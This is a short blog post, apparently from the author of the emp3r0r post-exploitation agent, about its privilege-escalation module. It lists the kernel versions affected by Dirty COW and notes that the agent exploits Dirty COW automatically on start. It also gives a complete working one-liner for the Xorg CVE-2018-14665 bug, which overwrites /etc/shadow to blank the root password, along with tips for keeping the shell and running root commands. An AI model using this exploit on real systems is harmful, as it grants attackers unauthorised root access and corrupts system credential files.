get root

happy Chinese new year!

the coronavirus outbreak in Wuhan keeps me from going outside, actually i have cancelled all travel plans in this holiday. what do i do at home then?


this module can help you get root via:

  • kernel exploits
  • userland LPE exploits, such as exim, sudo
  • previously-implemented backdoors




dirtycow is no doubt the most famous linux LPE exploit so far, according to Wikipedia, affected linux versions including:

Earliest kernel version fixed Linux distribution that uses this
3.2.0-113.155 Ubuntu 12.04 LTS
3.13.0-100.147 Ubuntu 14.04 LTS (Linux Mint 17.1)
3.16.36-1+deb8u2 Debian 8
4.4.0-45.66 Ubuntu 16.04 LTS
4.8.0-26.28 Ubuntu 16.10
3.10.0-327.36.3 RHEL 7, CentOS 7
2.6.32-642.6.2 RHEL 6, CentOS 6
2.6.18-416 RHEL 5, CentOS 5
3.0.101-84.1 SLES 11 SP4
3.12.60-52.57.1 SLES 12 GA LTSS
3.12.62- SLES 12 SP1

its really a long list, you will love this exploit

i made a version checker with this table, and implemented a golang version of dirtycow exploit in emp3r0r agent

the agent tries to exploit dirtycow upon start when applicable

xorg (CVE-2018-14665)

xorg-server from 1.19 to 1.20.1 are vulnerable, the exploit is pretty simple:

cd /etc;Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su

serveral tips:

  • the logfile path has to be relative, thus cd is required
  • fp means font path, this piece of value will appear in the resulting logfile, as a single line
  • you might want to kill $! after the logfile is overwritten, otherwise you lose your current TTY to operate on
  • /etc/shadow gets overwritten with logfile, with one valid line root::16431:0:99999:7:::, which clears root password
  • su doesnt ask for password if theres no password, use su -c <command> to execute arbitrary command as root


comments powered by Disqus